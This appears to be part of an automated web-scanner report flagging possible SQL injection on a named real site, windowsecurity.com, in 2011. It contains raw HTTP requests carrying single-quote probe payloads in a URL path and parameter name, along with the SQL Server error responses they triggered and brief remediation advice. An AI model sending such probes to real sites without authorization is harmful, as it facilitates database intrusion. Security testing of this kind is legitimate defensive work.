GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565'/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CBKAFEIDHBGKDLCCDKPFHGCC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565''/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=HBKAFEIDIMHNCKACEADOOBCC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
1.62. http://www.windowsecurity.com/articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [name of an arbitrarily supplied request parameter]previous
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images?1'=1 HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23740 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=PJJAFEIDPMJLHGPBMKDGHIBH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near '='.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images?1''=1 HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CKJAFEIDDJHAGPIOJFFHDGKI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...